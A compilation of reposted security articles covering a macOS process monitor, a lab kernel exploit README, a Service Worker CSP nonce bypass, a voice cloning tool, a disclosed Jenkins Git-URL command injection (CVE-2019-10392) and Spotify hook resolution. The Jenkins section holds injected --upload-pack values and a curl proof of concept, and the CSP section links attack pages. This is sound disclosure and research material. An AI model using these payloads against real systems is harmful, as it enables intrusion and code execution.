    ES_EVENT_TYPE_NOTIFY_SIGNAL,
    ES_EVENT_TYPE_NOTIFY_UNLINK,
    ES_EVENT_TYPE_NOTIFY_WRITE,
    ES_EVENT_TYPE_AUTH_FILE_PROVIDER_MATERIALIZE,
    ES_EVENT_TYPE_NOTIFY_FILE_PROVIDER_MATERIALIZE,
    ES_EVENT_TYPE_AUTH_FILE_PROVIDER_UPDATE,
    ES_EVENT_TYPE_NOTIFY_FILE_PROVIDER_UPDATE,
    ES_EVENT_TYPE_AUTH_READLINK,
    ES_EVENT_TYPE_NOTIFY_READLINK,
    ES_EVENT_TYPE_AUTH_TRUNCATE,
    ES_EVENT_TYPE_NOTIFY_TRUNCATE,
    ES_EVENT_TYPE_AUTH_LINK,
    ES_EVENT_TYPE_NOTIFY_LOOKUP,
    ES_EVENT_TYPE_LAST
} es_event_type_t;

Note there are two main event types: ES_EVENT_TYPE_AUTH_* and ES_EVENT_TYPE_NOTIFY_*

ES_EVENT_TYPE_AUTH_*
Events that require a response before being allowed to proceed.
For example, an ES_EVENT_TYPE_AUTH_EXEC event will block a process execution until the subscriber (i.e. your security tool) provides a response.

ES_EVENT_TYPE_NOTIFY_*
Events that simply notify the subscriber (i.e. they do not require a response before the event is allowed to proceed). For example, the ES_EVENT_TYPE_NOTIFY_EXEC event simply notifies one that a process is (about to) execute.

In our process monitor, we only utilize ES_EVENT_TYPE_NOTIFY_* events. These events are also succinctly described in Apple's documentation for the es_event_type_t enumeration. Once the es_subscribe function successfully returns (ES_RETURN_SUCCESS), the Endpoint Security Subsystem will start delivering events.

Event/Message Delivery
We (just) discussed how to subscribe to events from the Endpoint Security Subsystem by invoking:

the es_new_client function
the es_subscribe function

Of course, we'll want to add some logic/code to process the received messages. Recall that the final argument of the es_new_client function is a callback block (or handler). Apple states: "The handler block...will be run on all messages sent to this client."

The block is invoked with the endpoint client and, most importantly, the message from the Endpoint Security Subsystem. This message variable is a pointer of type es_message_t (i.e. es_message_t*). Apple adequately "documents" the es_message_t structure in the (aptly named) ESMessage.h file, and also online.

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h

/**
 * es_message_t is the top level datatype that encodes information sent from the ES subsystem to its clients
 * Each security event being processed by the ES subsystem will be encoded in an es_message_t
 * A message can be an authorization request or a notification of an event that has already taken place
 * The action_type indicates if the action field is an auth or notify action
 * The event_type indicates which event struct is defined in the event union.
 */
typedef struct {
    uint32_t version;
    struct timespec time;
    uint64_t mach_time;
    uint64_t deadline;
    es_process_t * _Nullable process;
    uint8_t reserved[8];
    es_action_type_t action_type;
    union {
        es_event_id_t auth;
        es_result_t notify;
    } action;
    es_event_type_t event_type;
    es_events_t event;
    uint64_t opaque[]; /* Opaque data that must not be accessed directly */
} es_message_t;

Notable members of interest include:

es_process_t * process
A pointer to a structure that describes the process responsible for the event.

es_event_type_t event_type
The type of event (which will match one of the events we subscribed to, e.g. ES_EVENT_TYPE_NOTIFY_EXEC).

es_events_t event
An event-specific structure (e.g. es_event_exec_t exec).

Since we only subscribed to three events (ES_EVENT_TYPE_NOTIFY_EXEC, ES_EVENT_TYPE_NOTIFY_FORK, and ES_EVENT_TYPE_NOTIFY_EXIT), processing the received messages is fairly straightforward. For each of these three events, we are interested in extracting a pointer to an es_process_t which will hold the information about the process (starting, forking, or terminating).

Recall the es_message_t structure received in the es_new_client callback contains a member: es_process_t * process (message->process). However, as noted, this is the process responsible for the action, which might not always be the es_process_t * we're actually interested in. Huh? In the case of a process exec (ES_EVENT_TYPE_NOTIFY_EXEC) event, message->process will describe the process that is responsible for spawning the process. In other words, the parent.
We are actually interested in the child, that is, the process that is about to be (or just was) spawned. For example, if we hop into a terminal and run the ls command, message->process points to the shell process (/bin/zsh). This of course is the parent - the process responsible for executing /bin/ls:

(lldb) p message->process.executable.path
(es_string_token_t) $17 = (length = 8, data = "/bin/zsh")

So how do we 'find' the es_process_t * that points to the child process (/bin/ls)? Recall the message structure contains a member named event_type. In the case of a process exec this will be set to ES_EVENT_TYPE_NOTIFY_EXEC and message->event will point to an es_event_exec_t structure (defined in ESMessage.h):

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h

typedef struct {
    es_process_t * _Nullable target;
    es_token_t args;
    uint8_t reserved[64];
} es_event_exec_t;

The target member of this structure contains a pointer to the es_process_t we're interested in (i.e. the one that describes /bin/ls):

(lldb) p message->event.exec.target->executable.path
(es_string_token_t) $16 = (length = 7, data = "/bin/ls")

What about the other two events we've subscribed to? For ES_EVENT_TYPE_NOTIFY_FORK events, the message contains an event of type es_event_fork_t, which holds information about the child process in es_process_t * child. For ES_EVENT_TYPE_NOTIFY_EXIT events, we can simply use message->process (as the process generating the exit event is the one we're interested in; that is to say, the process that's about to exit).

If you're comfortable reading code, the following should now make sense:

//process of interest
es_process_t* process = NULL;

//set type
// extract (relevant) process object, etc
switch (message->event_type) {

    //exec
    case ES_EVENT_TYPE_NOTIFY_EXEC:
        process = message->event.exec.target;
        break;

    //fork
    case ES_EVENT_TYPE_NOTIFY_FORK:
        process = message->event.fork.child;
        break;

    //exit
    case ES_EVENT_TYPE_NOTIFY_EXIT:
        process = message->process;
        break;
}

Now we (finally) have a pointer to the (relevant) es_process_t process structure. The definition for this structure can be found in the ESMessage.h header file:

$ less /MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h
...
/**
 * @brief describes a process that took the action being described in an es_message_t
 * For exec events also describes the newly executing process
 */
typedef struct {
    audit_token_t audit_token;
    pid_t ppid;
    pid_t original_ppid;
    pid_t group_id;
    pid_t session_id;
    uint32_t codesigning_flags;
    bool is_platform_binary;
    bool is_es_client;
    uint8_t cdhash[CS_CDHASH_LEN];
    es_string_token_t signing_id;
    es_string_token_t team_id;
    es_file_t * _Nullable executable;
} es_process_t;

The es_process_t structure is also documented by Apple as part of its Endpoint Security developer documentation. Let's discuss the various fields in the structure, as they'll be relevant for the process monitor we're building.

First, we're interested in extracting the process id (pid) from this structure. Though the es_process_t doesn't directly contain a process pid, it does contain an audit token (type: audit_token_t). In the ESMessage.h header file, Apple states that "values such as PID, UID, GID, etc.
can be extracted from the audit token via API in libbsm.h." Specifically, we can invoke audit_token_to_pid (passing in the audit_token member of the es_process_t structure):

//extract pid
pid_t pid = audit_token_to_pid(process->audit_token);

Of course, we're also interested in the path to the process's executable. This is found within the executable member of the es_process_t structure. The executable member is a pointer to an es_file_t structure:

$ less /MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h
...
/**
 * es_file_t provides the inode/devno and path to a file that relates to a security event
 * the path may be truncated, which is indicated by the path_truncated flag.
 */
typedef struct {
    es_string_token_t path;
    bool path_truncated;
    union {
        dev_t devno;
        fsid_t fsid;
    };
    ino64_t inode;
} es_file_t;

The path to the process's executable is found in the path member of the es_file_t structure (&process->executable->path). Its type is es_string_token_t (defined in ESTypes.h):

$ less /MacOSX10.15.sdk/usr/include/EndpointSecurity/ESTypes.h

/**
 * @brief Structure for handling packed blobs of serialized data
 */
typedef struct {
    size_t length;
    const char * data;
} es_string_token_t;

We can convert this to a more "friendly" data type such as an NSString via the following code snippet:

//convert to data, then to string
NSString* string = [NSString stringWithUTF8String:[[NSData dataWithBytes:stringToken->data length:stringToken->length] bytes]];

If the process event is an ES_EVENT_TYPE_NOTIFY_EXEC, the message->event member holds an es_event_exec_t structure, which contains the process's arguments (es_event_exec_t->args):

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h
...
/**
 * Arguments and environment variables are packed, use the following functions to operate on this field:
 * `es_exec_env`, `es_exec_arg`, `es_exec_env_count`, and `es_exec_arg_count`
 */
typedef struct {
    es_process_t * _Nullable target;
    es_token_t args;
    uint8_t reserved[64];
} es_event_exec_t;

As noted in the comments within the ESMessage.h header file, the arguments are packed. The following helper method (which utilizes es_exec_arg_count and es_exec_arg) unpacks all arguments into an array:

//extract/format args
-(void)extractArgs:(es_events_t *)event
{
    //number of args
    uint32_t count = 0;

    //argument
    NSString* argument = nil;

    //get # of args
    count = es_exec_arg_count(&event->exec);
    if(0 == count)
    {
        //bail
        goto bail;
    }

    //extract all args
    for(uint32_t i = 0; i < count; i++)
    {
        //current arg
        es_string_token_t currentArg = {0};

        //extract current arg
        currentArg = es_exec_arg(&event->exec, i);

        //convert argument (es_string_token_t) to string
        argument = convertStringToken(&currentArg);
        if(nil != argument)
        {
            //append
            [self.arguments addObject:argument];
        }
    }

bail:

    return;
}

Once we've extracted the process's identifier (pid), path, and arguments, all that's left is the code signing information.
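(As an aside: the snippets here and below call a convertStringToken helper that isn't listed separately in this post. A minimal sketch of it, assuming it simply wraps the token's (non-NUL-terminated) bytes in an NSString and guards against empty tokens:)

//convert an es_string_token_t to an NSString
// note: token data isn't guaranteed to be NUL-terminated, so copy by length
NSString* convertStringToken(es_string_token_t* stringToken)
{
    //sanity check
    if( (NULL == stringToken) ||
        (NULL == stringToken->data) ||
        (0 == stringToken->length) )
    {
        //bail
        return nil;
    }

    //wrap bytes
    return [[NSString alloc] initWithBytes:stringToken->data
                                    length:stringToken->length
                                  encoding:NSUTF8StringEncoding];
}

Back to that final item: the code-signing information.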
This is pretty trivial, as such code signing information is directly embedded in the es_process_t structure:

code signing flags: (uint32_t) process->codesigning_flags
These are "standard" macOS code-signing flags, found in the cs_blobs.h file.

code signing id: (es_string_token_t) process->signing_id
This is "the identifier used to sign the process."

team id: (es_string_token_t) process->team_id
This is "the team identifier used to sign the process."

cdHash: (uint8_t array[CS_CDHASH_LEN]) process->cdhash
This is "the code directory hash value."

Below is some (well-commented) code that extracts and formats code-signing information from the es_process_t structure into a (ns)dictionary:

//extract/format signing info
-(void)extractSigningInfo:(es_process_t *)process
{
    //cd hash
    NSMutableString* cdHash = nil;

    //signing id
    NSString* signingID = nil;

    //team id
    NSString* teamID = nil;

    //alloc string for hash
    cdHash = [NSMutableString string];

    //add flags
    self.signingInfo[KEY_SIGNATURE_FLAGS] =
      [NSNumber numberWithUnsignedInt:process->codesigning_flags];

    //convert/add signing id
    signingID = convertStringToken(&process->signing_id);
    if(nil != signingID)
    {
        //add
        self.signingInfo[KEY_SIGNATURE_IDENTIFIER] = signingID;
    }

    //convert/add team id
    teamID = convertStringToken(&process->team_id);
    if(nil != teamID)
    {
        //add
        self.signingInfo[KEY_SIGNATURE_TEAM_IDENTIFIER] = teamID;
    }

    //add platform binary
    self.signingInfo[KEY_SIGNATURE_PLATFORM_BINARY] =
      [NSNumber numberWithBool:process->is_platform_binary];

    //format cdhash
    for(uint32_t i = 0; i<CS_CDHASH_LEN; i++)
    {
        //append
        [cdHash appendFormat:@"%X", process->cdhash[i]];
    }

    //add cdhash
    self.signingInfo[KEY_SIGNATURE_CDHASH] = cdHash;

    return;
}

Although we're generally more interested in process creation events, we might also want to track process termination events (ES_EVENT_TYPE_NOTIFY_EXIT). When an ES_EVENT_TYPE_NOTIFY_EXIT event is delivered, message->event will point to a structure of type es_event_exit_t:

typedef struct {
    int stat;
    uint8_t reserved[64];
} es_event_exit_t;

From this structure, we can extract the process's exit code (via the stat member):

//grab process's exit code
int exitCode = message->event.exit.stat;

Process Monitor Library
As noted, many of Objective-See's tools track process creations, and thus currently utilize my original process monitoring library, Proc Info. This library leverages Apple's OpenBSM subsystem in order to provide process events. As we previously discussed, there are several complexities and limitations of the OpenBSM subsystem (most notably, process events from the subsystem do not include code-signing information).

Lucky us: as shown in this blog, we can now leverage Apple's Endpoint Security Subsystem to effectively and comprehensively monitor process events (from user-mode!). As such, today I'm releasing an open-source process monitoring library that implements everything we've discussed here 🥳

On github: Process Monitoring Library

It's fairly simple to leverage this library in your own (non-commercial) tools:

Build the library, libProcessMonitor.a

Add the library and its header file (ProcessMonitor.h) to your project:
#import "ProcessMonitor.h"
As shown above, you'll also have to link against the libbsm (for audit_token_to_pid) and libEndpointSecurity libraries.

Add the com.apple.developer.endpoint-security.client entitlement (to your project's Info.plist file).
Write some code to interface with the library!

This final step involves instantiating a ProcessMonitor object and invoking the start method (passing in a callback block that's invoked on process events). Below is some sample code that implements this logic:

//init monitor
ProcessMonitor* procMon = [[ProcessMonitor alloc] init];

//define block
// automatically invoked upon process events
ProcessCallbackBlock block = ^(Process* process)
{
    switch(process.event)
    {
        //exec
        case ES_EVENT_TYPE_NOTIFY_EXEC:
            NSLog(@"PROCESS EXEC ('ES_EVENT_TYPE_NOTIFY_EXEC')");
            break;

        //fork
        case ES_EVENT_TYPE_NOTIFY_FORK:
            NSLog(@"PROCESS FORK ('ES_EVENT_TYPE_NOTIFY_FORK')");
            break;

        //exit
        case ES_EVENT_TYPE_NOTIFY_EXIT:
            NSLog(@"PROCESS EXIT ('ES_EVENT_TYPE_NOTIFY_EXIT')");
            break;

        default:
            break;
    }

    //print process info
    NSLog(@"%@", process);

};

//start monitoring
// pass in block for events
[procMon start:block];

//run loop
// as don't want to exit
[[NSRunLoop currentRunLoop] run];

Once the [procMon start:block] method has been invoked, the Process Monitoring library will automatically invoke the callback (block) on process events, returning a Process object. The Process object is declared in the library's header file, ProcessMonitor.h. This object contains information about the process (responsible for the event), including:

pid
path
ancestors
signing info
...and more!

Take a peek at the ProcessMonitor.h file for more details. Once compiled, we're ready to start monitoring for process events! Here, for example, we run ls -lart .

# ./processMonitor
...
PROCESS EXEC ('ES_EVENT_TYPE_NOTIFY_EXEC')
pid: 7655
path: /bin/ls
uid: 501
args: (
    ls,
    "-lart",
    "."
)
ancestors: (
    6818,
    6817,
    338,
    1
)
signing info: {
    cdHash = 5180A360C9484D61AF2CE737EAE9EBAE5B7E2850;
    csFlags = 603996161;
    isPlatformBinary = 1 (true);
    signatureIdentifier = "com.apple.ls";
}

PROCESS EXIT ('ES_EVENT_TYPE_NOTIFY_EXIT')
pid: 7655
path: /bin/ls
uid: 501
signing info: {
    cdHash = 5180A360C9484D61AF2CE737EAE9EBAE5B7E2850;
    csFlags = 603996161;
    isPlatformBinary = 1;
    signatureIdentifier = "com.apple.ls";
}
exit code: 0

Once I receive the com.apple.developer.endpoint-security.client entitlement from Apple, I'll release a pre-built binary (that links against the "Process Monitor" framework)!

Conclusion
Previously, writing a (user-mode) process monitor for macOS was not a trivial task. Thanks to Apple's new Endpoint Security Subsystem/Framework (on macOS 10.15+), it's now a breeze! In short, one simply invokes the es_new_client & es_subscribe functions to subscribe to events of interest (recalling that the com.apple.developer.endpoint-security.client entitlement is required).

For a process monitor, we illustrated how to subscribe to the three process-related events:

ES_EVENT_TYPE_NOTIFY_EXEC
ES_EVENT_TYPE_NOTIFY_FORK
ES_EVENT_TYPE_NOTIFY_EXIT

We then showed how to extract the relevant es_process_t process structure and parse out all relevant process meta-data, such as the process identifier, path, arguments, and code-signing information. Finally, we discussed an open-source process monitoring library that implements everything we've discussed here today. 🥳

❤️ Love these blog posts and/or want to support my research and tools? You can support them via my Patreon page!

Sursa: https://objective-see.com/blog/blog_0x47.html
-
macOS-Kernel-Exploit

DISCLAIMER
You need to know the KASLR slide to use the exploit. Also, SMAP needs to be disabled, which means that it's not exploitable on Macs after 2015. These limitations make the exploit pretty much unusable for in-the-wild exploitation but still helpful for security researchers in a controlled lab environment. This exploit is intended for security research purposes only.

General
macOS Kernel Exploit for CVE-????-???? (currently a 0day; I'll add the CVE# once it is published). Thanks to @LinusHenze for this cool bug and his support ;P.

Writeup
Probably coming soon. If you want to try and exploit it yourself, here are a few things to get you started:

VM: Download the macOS installer from the appstore and drag the .app file into VMware's NEW VM window
Kernel debugging setup: http://ddeville.me/2015/08/using-the-vmware-fusion-gdb-stub-for-kernel-debugging-with-lldb
Have a look at the _kernel_trap function

Build
I recommend setting the bootargs to: debug=0x44 kcsuffix=development -v
⚠️ Note: SMAP needs to be disabled on Macs after 2015 (-pmap_smap_disable)
You will need Xcode <= 9.4.1 to build the exploit (it needs to be 32-bit). Downloading the Xcode 9.4.1 Commandline Tools should be enough.
Download: https://developer.apple.com/download/more/

make

Execution
./exploit <KASLR slide>

Tested on macOS Mojave:
Darwin Kernel-Mac.local 18.7.0 Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/DEVELOPMENT_X86_64 x86_64

Demo:

Sursa: https://github.com/A2nkF/macOS-Kernel-Exploit/
-
Nonce-based CSP + Service Worker = CSP bypass?

Service Worker is a great technology that allows you to develop your web app's offline experience and increase the performance of your website. But this also means that a web page is cached. And if your website has a nonce-based CSP, then your CSP will also be cached. This means that no matter how random the nonce is (and even if you serve different nonces for every request), as long as the Service Worker sees that the request is the same, it'll respond with cached content, which always has the same CSP nonce.

To see if this can be exploited, I made a CSP bypass challenge.

https://vuln.shhnjk.com/secure_sw.php#Guest

The above page uses Strict CSP, and the Service Worker code was taken from Google's SW intro page (the second example you see when you click the link). So it should be safe against XSS bugs, right? Well, the challenge was made in a way that makes it possible to bypass Strict CSP, and I'm hoping that people will find this CSP bypass in real websites someday.

The challenge has 2 injection points:

location.hash (Service Worker doesn't see the hash)
Referrer passed to the server (Service Worker doesn't see this either)

There are many other sources of XSS that Service Worker doesn't use as a key for a request (e.g. a stored XSS payload can't be keyed either). The intended solution was the following:

https://attack.shhnjk.com/CSP_SW_bypass.html?%3Ciframe%20src=%27https://attack.shhnjk.com/get_nonce.html%27%20name=%27

Gareth wrote a great post about leaking information using the <base> tag's target attribute even under Strict CSP. I used a similar trick, which is the iframe's name. I used the referrer to inject an iframe whose name attribute leaked the nonce of the legit script tag, then simply used the leaked nonce to execute script through location.hash. This is possible because Service Worker doesn't care about changes in location.hash, so it'll still serve cached content.

On the other hand, @lbherrera_ solved the challenge using CSS.

https://lbherrera.me/solver.html

He used the referrer to inject an <input> tag with the nonce set as its value, and then brute-forced the nonce character by character using CSS. Whenever the brute-force identified a character, a request was sent to his server, which set a cookie with the matched nonce character, saving the whole nonce this way. After the whole nonce was stolen, he used location.hash to perform XSS with the proper nonce.

Conclusion:

Service Worker might help bypass nonce-based CSP.
Always fix XSS bugs even if XSS is blocked by CSP.
From time to time, I find CSP bypasses in the browser as well (e.g. this).
All mitigations have bypasses.

Sursa: https://shhnjk.blogspot.com/2019/09/nonce-based-csp-service-worker-csp.html
-
Real-Time Voice Cloning

This repository is an implementation of Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis (SV2TTS) with a vocoder that works in real-time. Feel free to check my thesis if you're curious or if you're looking for info I haven't documented yet (don't hesitate to make an issue for that too). Mostly, I would recommend giving a quick look to the figures beyond the introduction.

SV2TTS is a three-stage deep learning framework that allows you to create a numerical representation of a voice from a few seconds of audio, and to use it to condition a text-to-speech model trained to generalize to new voices.

Video demonstration (click the picture):

Papers implemented
URL | Designation | Title | Implementation source
1806.04558 | SV2TTS | Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis | This repo
1802.08435 | WaveRNN (vocoder) | Efficient Neural Audio Synthesis | fatchord/WaveRNN
1712.05884 | Tacotron 2 (synthesizer) | Natural TTS Synthesis by Conditioning Wavenet on Mel Spectrogram Predictions | Rayhane-mamah/Tacotron-2
1710.10467 | GE2E (encoder) | Generalized End-To-End Loss for Speaker Verification | This repo

News
20/08/19: I'm working on resemblyzer, an independent package for the voice encoder. You can use your trained encoder models from this repo with it.
06/07/19: Need to run within a docker container on a remote server? See here.
25/06/19: Experimental support for low-memory GPUs (~2gb) added for the synthesizer. Pass --low_mem to demo_cli.py or demo_toolbox.py to enable it. It adds a big overhead, so it's not recommended if you have enough VRAM.

Quick start

Requirements
You will need the following whether you plan to use the toolbox only or to retrain the models:
Python 3.7. Python 3.6 might work too, but I wouldn't go lower because I make extensive use of pathlib.
Run pip install -r requirements.txt to install the necessary packages.
Additionally you will need PyTorch (>=1.0.1).
A GPU is mandatory, but you don't necessarily need a high tier GPU if you only want to use the toolbox.

Pretrained models
Download the latest here.

Preliminary
Before you download any dataset, you can begin by testing your configuration with:
python demo_cli.py
If all tests pass, you're good to go.

Datasets
For playing with the toolbox alone, I only recommend downloading LibriSpeech/train-clean-100. Extract the contents as <datasets_root>/LibriSpeech/train-clean-100 where <datasets_root> is a directory of your choosing. Other datasets are supported in the toolbox, see here. You're free not to download any dataset, but then you will need your own data as audio files or you will have to record it with the toolbox.

Toolbox
You can then try the toolbox:
python demo_toolbox.py -d <datasets_root>
or
python demo_toolbox.py
depending on whether you downloaded any datasets. If you are running an X-server or if you have the error Aborted (core dumped), see this issue.

Wiki
How it all works (WIP - stub, you might be better off reading my thesis until it's done)
Training models yourself
Training with other data/languages (WIP - see here for now)
TODO and planned features

Contribution
Feel free to open issues or PRs for any problem you may encounter, typos that you see or aspects that are confusing. I try to reply to every issue. I'm working full-time as of June 2019. I won't be making progress of my own on this repo, but I will still gladly merge PRs and accept contributions to the wiki. Don't hesitate to send me an email if you wish to contribute.
Sursa: https://github.com/CorentinJ/Real-Time-Voice-Cloning
-
Sep 12, 2019
CVE-2019-10392 — Yet Another 2k19 Authenticated Remote Command Execution in Jenkins

Two weeks ago I saw a nice repository on GitHub about pentesting Jenkins. I downloaded the latest alpine LTS build from Docker Hub and started to play with it, ending up finding an authenticated Remote Command Execution exploitable by a user with the Job\Configure (USE_ITEM) privilege. 🐱👤

Discovery
I launched a Jenkins instance locally with Docker using the following command:

docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:lts-alpine

In my case, the software versions are:

Jenkins 2.176.3
Git Client Plugin 2.8.2
Git Plugin 3.12.0

I proceeded through the initial configuration and created a non-administrative user. After logging in as user test, we create a new job definition via the web user interface. If we select Git as our source in the SCM section, we are asked to insert a Git URL. Let's fuzz it! 🤖

If we try common command injection payloads, we notice that we can't execute arbitrary commands, but if we input the string -v as the URL, we receive the following output:

Failed to connect to repository : Command "git ls-remote -h -v HEAD" returned status code 129:
stdout:
stderr: error: unknown switch `v'
usage: git ls-remote [--heads] [--tags] [--refs] [--upload-pack=<exec>]
                     [-q | --quiet] [--exit-code] [--get-url]
                     [--symref] [<repository> [<refs>...]]

    -q, --quiet           do not print remote URL
    --upload-pack <exec>  path of git-upload-pack on the remote host
    -t, --tags            limit to tags
    -h, --heads           limit to heads
    --refs                do not show peeled tags
    --get-url             take url.<base>.insteadOf into account
    --sort <key>          field name to sort on
    --exit-code           exit with exit code 2 if no matching refs are found
    --symref              show underlying ref in addition to the object pointed by it
    -o, --server-option <server-specific>
                          option to transmit

We have just discovered that command line switches are interpreted by Git, thanks to the error: unknown switch `v' message. Can we do more than printing the Git usage? Let's find out! 🕵️

Exploitation
I looked at man git-ls-remote in order to see the available command options and noticed the --upload-pack=<exec> flag. By trying --upload-pack=id, I got:

Failed to connect to repository : Command "git ls-remote -h --upload-pack=id HEAD" returned status code 128:
stdout:
stderr: id: 'HEAD': no such user
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.

The command id HEAD was executed on the system! 🤹 We can control the full command being executed using the following payload:

--upload-pack="`id`"

Failed to connect to repository : Command "git ls-remote -h --upload-pack="`id`" HEAD" returned status code 128:
stdout:
stderr: "`id`" 'HEAD': line 1: uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins): not found
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.

We successfully executed the id command in the context of the jenkins user!
💥 Proof of Concept
First we need to retrieve the CSRF token, then issue the request:

# get crumb
curl 'http://localhost:8080/securityRealm/user/test/crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)' -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36' -H 'DNT: 1' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://localhost:8080/' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9,it;q=0.8' -H 'Cookie: <COOKIES>' --compressed

# send request
curl 'http://localhost:8080/job/test/descriptorByName/hudson.plugins.git.UserRemoteConfig/checkUrl' -d "value=--upload-pack=`touch /tmp/iwantmore.pizza`" -H 'Cookie: <COOKIES>' -H 'Origin: http://localhost:8080' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9,it;q=0.8' -H 'X-Prototype-Version: 1.7' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Jenkins-Crumb: <CRUMB>' -H 'Pragma: no-cache' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36' -H 'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: text/javascript, text/html, application/xml, text/xml, */*' -H 'Cache-Control: no-cache' -H 'Referer: http://localhost:8080/job/test/configure' -H 'DNT: 1' --compressed

Reporting
I reported the issue to the Jenkins JIRA and in less than one week the vulnerability was confirmed to be fixed in the staging environment. Props to the Jenkins team for how they managed the responsible disclosure process, in particular to Daniel Beck and Mark Waite. 👏

Timeline
2019-09-03: vulnerability discovered
2019-09-03: vulnerability reported
2019-09-04: first response by the vendor
2019-09-04: vulnerability acknowledged
2019-09-07: fix available
2019-09-08: fix confirmed
2019-09-08: CVE-2019-10392 was issued
2019-09-11: pre announcement
2019-09-12: @TheHackersNews tweet
2019-09-12: fix released and public announcement

Sursa: https://iwantmore.pizza/posts/cve-2019-10392.html
-
Skiptracing: Automated Hook Resolution
Sam Lerner
Sep 17 · 11 min read

This post is the third part of my series about tracking skips in the Spotify client. This post is a direct continuation of my work on the MacOS client first detailed here: https://medium.com/@lerner98/skiptracing-reversing-spotify-app-3a6df367287d.

Hardcoding Addresses
In the previous article, I hooked the target functions using HookCase to track when the skip subprocedure was called. However, there was one big problem with this approach that I didn't realize at the time. One day, I decided to see how many skipped songs I had logged. It seemed low. I then decided to skip a few songs and again print out the number of songs. It didn't change. Dammit! Something broke and I had no clue what.

Finding the Problem
Let's crack open Spotify in IDA and go to our hook addresses as a sanity check. In the previous article, I made a big deal about finding sub_100CC2E20, so let's go there and see what could've gone wrong:

This doesn't look anything like our next procedure. In fact, 0x100CC2E20 isn't even on an instruction boundary. This is a big problem. Going back to the mediaKeyTap method, we find a familiar-looking CFG:

However, there is one big (highlighted) difference. The address of our called procedure has changed from 0x10006FE10 to 0x100069CF0, a difference of -24864 bytes. Now going to our function with the big switch statement:

We see that it is now located at 0x100067E40 when it was located at 0x10006DE40 previously: a difference of -24576. The closeness of these offsets gives us a clue to what is going on. My theory is that Spotify occasionally updates itself and on this particular update (or set of updates), around 24000 bytes were removed before our target procedures and a couple hundred were added in between them. This presents us with a conundrum: how do we find the correct addresses to hook when they could change between runs? The answer is Objective-C.

Objective-C
Objective-C is at heart a dynamic language. You can add methods to a class, change a method's implementation, and do all sorts of fuckery at runtime. To support this behavior, the class information must be stored in the application binary somewhere. If you run objdump -h on the Spotify binary, you'll see the following interesting sections:

namely the sections that begin with __objc. The first section we'll want to take a look at is the __objc_classlist section. While undocumented, this section contains an array of pointers into the __objc_data section where each pointer points to an objc_class struct. We will discuss the layout of the struct later.

Our end goal will be to find the addresses of the unnamed next and previous subprocedures, but our bridge to these addresses will be the mediaKeyTap method, because we can always find it with the help of the Objective-C class data.

Resolving Objective-C Methods
The class that responds to the mediaKeyTap:receivedMediaKeyEvent: selector is SPTBrowserClientMacObjCAnnex. Therefore, we can iterate over the objc_class structures pointed to by the __objc_classlist section until the name of the struct is equal to SPTBrowserClientMacObjCAnnex. Let's get to it.

First, we have to iterate over the __objc_classlist section. But to do that, we need to know where the section is. This information is contained within the Mach-O header (which is why it was revealed with objdump -h).
Parsing the Header
There are plenty of existing articles about the Mach-O file format and the documentation is fairly lucid, so I won't go into too much detail here. All you really need to know is that there are several "segment load commands" contained within the header. A segment load command (LC) simply specifies a region of the file and where to map it into memory. Directly after the segment LC, there will be a number of section structs. Each section's extent, both within the file and in virtual memory, is contained within its corresponding segment, but the sections offer a more fine-grained mapping.

If you were paying attention before, the __objc_classlist section is contained within the __DATA segment. Therefore, we can find its region in the file like so:

#include <mach-o/loader.h>

FILE *fp;
size_t i,j,curr_off;
struct mach_header_64 header;
struct load_command load_cmd;
struct segment_command_64 seg_cmd;
struct section_64 sect;
struct section_64 objc_classlist_sect;

fp = fopen("/Applications/Spotify.app/Contents/MacOS/Spotify", "r");
fread(&header, sizeof(header), 1, fp);

Here, we are simply setting up some variables and reading in the Mach-O header. Then, we can iterate over the load commands:

for (i=0; i<header.ncmds; i++) {
    fread(&load_cmd, sizeof(load_cmd), 1, fp);
    if (load_cmd.cmd != LC_SEGMENT_64) {
        fseek(fp, load_cmd.cmdsize - sizeof(load_cmd), SEEK_CUR);
        continue;
    }

    //copy the already-read header bytes, then read the rest of the segment LC
    memcpy(&seg_cmd, &load_cmd, sizeof(load_cmd));
    fread((char *)&seg_cmd + sizeof(load_cmd), sizeof(seg_cmd) - sizeof(load_cmd), 1, fp);
    if (strcmp(seg_cmd.segname, "__DATA")) {
        fseek(fp, load_cmd.cmdsize - sizeof(seg_cmd), SEEK_CUR);
        continue;
    }

Here, we ignore any LC's that are not segment LC's (there are many different types specified in the ABI). We then read in the LC as a segment LC and ignore it if it is not the __DATA segment. Next, we iterate over the sections in the __DATA segment:

    for (j=0; j<seg_cmd.nsects; j++) {
        fread(&sect, sizeof(sect), 1, fp);
        if (!strncmp(sect.sectname, "__objc_classlist", 16)) {
            memcpy(&objc_classlist_sect, &sect, sizeof(sect));
            break;
        }
    }
    break;
}

